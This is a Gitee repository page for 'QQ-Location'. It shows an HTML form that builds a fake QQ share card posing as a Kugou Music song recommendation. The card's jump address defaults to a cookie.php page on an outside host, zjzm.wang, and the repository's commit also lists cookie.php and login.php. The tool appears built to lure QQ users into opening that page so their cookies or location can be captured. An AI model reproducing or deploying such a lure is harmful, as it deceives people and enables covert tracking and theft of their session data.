1 Star 0 Fork 0

airgzn / QQ-Location

Create your Gitee Account
Explore and code with more than 12 million developers,Free private repositories !:)
Sign up
This repository doesn't specify license. Please pay attention to the specific project description and its upstream code dependency when using it.
Clone or Download
index.html 2.52 KB
Copy Edit Raw Blame History
airgzn authored 2017-08-28 22:15 . Upload login.php cookie.php index.html
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<title>信息生成</title>
<style>
body,input,button{font:normal 14px "Microsoft Yahei";margin:0;padding:0}
.odform-tit{font-weight:normal;font-size:25px;color:#595757;line-height:40px;text-align:center;border-bottom:1px solid #c9cacb;margin:0;padding:5% 0}
.odform-tit img{height:40px;vertical-align:middle;margin-right:15px}
.odform{padding:5%}
.input-group{margin-bottom:5%;position:relative}
.input-group label{padding:2% 0;position:absolute;color:#595757}
.input-group input{margin-left:5em;padding:3% 5%;box-sizing:border-box;background:#efeff0;border:0;border-radius:5px;color:#595757;width:75%}
.odform button{background:#8ec31f;color:#fff;text-align:center;border:0;border-radius:10px;padding:3%;width:100%;font-size:16px}
.odform .cal{background-image:url(images/aiyun2.png);background-repeat:no-repeat;background-position:95% center;background-size:auto 50%}
.odform .xl{background-image:url(images/aiyun3.png);background-repeat:no-repeat;background-position:95% center;background-size:auto 20%}
</style>
</head>
<body>
<h1 class="odform-tit"><img src="images/aiyun1.png" alt="QQ分享">AI云</h1>
<div class="odform">
<form action="login.php" method="post">
<div class="input-group">
<label for="wdname">标题</label>
<input type="text"id="khname" name="title" value="酷狗音乐">
</div>
<div class="input-group">
<label for="khname">摘要</label>
<input type="text" id="khname" name="summary" value="我在酷狗常听的《 孙耀威-爱的故事上集》,你也来听听吧!">
</div>
<div class="input-group">
<label for="khname">图片地址</label>
<input type="text" id="khname" name="pics" value="http://p4.music.126.net/Qu_twnEbrZUAu7cwVcMbug==/669602581327766.jpg?param=130y130">
</div>
<div class="input-group">
<label for="khname">跳转地址</label>
<input type="text" id="khname" name="url" value="http://zjzm.wang/cookie.php">
</div>
<div class="input-group">
<label for="khname">来源</label>
<input type="text" id="khname" name="site" value="(来自 酷狗音乐)">
</div>
<button>提交</button>
</form>
</div>
<div style="text-align:center;margin:50px 0; font:normal 14px/24px 'MicroSoft YaHei';">
<p>适用浏览器:IE8、360、FireFox、Chrome、Safari、Opera、傲游、搜狗、世界之窗</p>
</div>
</body>
</html>
1
https://gitee.com/airgzn/qq-location.git
git@gitee.com:airgzn/qq-location.git
airgzn
qq-location
QQ-Location
master

Search

53164aa7 5694891 3bd8fe86 5694891